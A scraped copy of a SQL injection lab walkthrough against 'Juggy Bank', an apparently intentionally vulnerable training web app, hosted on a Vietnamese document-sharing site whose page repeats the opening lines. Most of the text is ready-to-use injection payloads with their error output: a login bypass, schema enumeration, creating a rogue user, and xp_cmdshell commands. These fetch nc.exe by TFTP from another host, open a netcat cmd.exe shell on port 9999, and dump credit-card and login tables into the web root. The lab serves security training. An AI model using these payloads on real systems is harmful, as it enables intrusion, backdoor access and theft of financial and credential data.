Juggy Bank SQL Injection Lab
First of all let’s work out what data base the system is running.
On your 2003 Server, open your web browser on type http://localhost/client2.htm
You should have an entry that shows the Juggy Bank web page
In the Login Name box type a single quote ‘ and press return.
This should return and error page showing the database type and the asp script
that has run
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark
before the character string '' and password = ''.
/login.asp, line 5
5 trang |
Chia sẻ: tlsuongmuoi | Lượt xem: 2561 | Lượt tải: 0
Bạn đang xem nội dung tài liệu Juggy Bank SQL Injection Lab, để tải tài liệu về máy bạn click vào nút DOWNLOAD ở trên
Juggy Bank SQL Injection Lab
First of all let’s work out what data base the system is running.
On your 2003 Server, open your web browser on type
You should have an entry that shows the Juggy Bank web page
In the Login Name box type a single quote ‘ and press return.
This should return and error page showing the database type and the asp script
that has run
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark
before the character string '' and password = ''.
/login.asp, line 5
As can be seen the back end database is running on MS SQL and the service
doesn’t handle error messages by redirecting to an oooops page.
Now let’s try blind SQL injecting into the Login Name box. This should bypass
the authentication system
In the Login box type
luke' or 1=1 --
This then makes the SQL statement passed to the database as follows
select * from userinfo where username=’luke’ or 1=1 -- and password=’’
Anything after the -- is ignored as a comment.
This should log you into the web page as the first user on the database.
Now let’s go back to the login screen and try enumerating the table. The first
thing we need is the table name. Insert into the login box the following
' having 1=1 --
This will cause the following error
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'userinfo.username' is invalid in the select list because it is not contained
in an aggregate function and there is no GROUP BY clause.
/login.asp, line 5
Notice the highlighted information, this is the Table name - userinfo and the
column name - username
Now we need to know the next columns in the table, type the following in the
Login box
' group by userinfo.username having 1=1 --
This causes the following error
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'userinfo.password' is invalid in the select list because it is not contained in
either an aggregate function or the GROUP BY clause.
/login.asp, line 5
Now let’s try once more with the userinfo.password
' group by userinfo.password having 1=1 --
We get the same column again, indicating two columns in the userinfo table.
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'userinfo.username' is invalid in the select list because it is not contained
in either an aggregate function or the GROUP BY clause.
/login.asp, line 5
We must now enumerate the column types
' union select sum(username) from userinfo --
Which gives the following error indicating type is varchar
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average
aggregate operation cannot take a varchar data type as an argument.
/login.asp, line 5
And same for the password column
' union select sum(password) from userinfo --
Which is also a varchar.
Now let’s create a new user.
' ; insert into userinfo values('john','password')--
Login with the new user created.
Further Investigation
Now let’s get some information on other databases.
Let put a file on the web server..........
'; exec master..xp_cmdshell "echo I was here on %date% >
c:\inetpub\wwwroot\Boo.txt" --
To check that the file is on the server open
To fetch a file from a TFTP server e.g. netcat from 172.16.0.11 server
'; exec master..xp_cmdshell 'tftp -i 172.16.0.11 get nc.exe
c:\inetpub\wwwroot\nc.exe' --
and then execute it listening on port 9999
';exec master..xp_cmdshell 'c:\inetpub\wwwroot\nc.exe -L -d -e cmd.exe -p
9999' --
You should now be able to telnet to the localhost on port 9999
Now let’s dump the credit card details into a txt file
';exec master..xp_cmdshell 'osql -E -Q "select * from
juggybank..creditcard" -o c:\inetpub\wwwroot\card_details.txt' --
To fetch those details off the web server browse to the page
To dump the login details
';exec master..xp_cmdshell 'osql -E -Q "select * from juggybank..userinfo" -
o c:\inetpub\wwwroot\logins.txt' --
To fetch those details off the web server browse to the page
Similar commands con be run to mine data on sysdatabases
';exec master..xp_cmdshell 'osql -E -Q "select * from
master..sysdatabases" -o c:\inetpub\wwwroot\masterdatabase.txt' --
';exec master..xp_cmdshell 'osql -E -Q "select * from
juggybank..sysobjects where xtype=''u'' " -o
c:\inetpub\wwwroot\juggybanktables.txt' --
In the above statement xtype=’’u’’ is actually two sets of single quotes not a
double
To fetch those details off the web server browse to the page
and
Another way with stored procedures
The above can be achieved by using a stored procedure.
'; exec sp_makewebtask "c:\inetpub\wwwroot\evil.html", "select * from
userinfo"; --
Now request this page with
Các file đính kèm theo tài liệu này:
- Juggy Bank SQL Injection Lab.pdf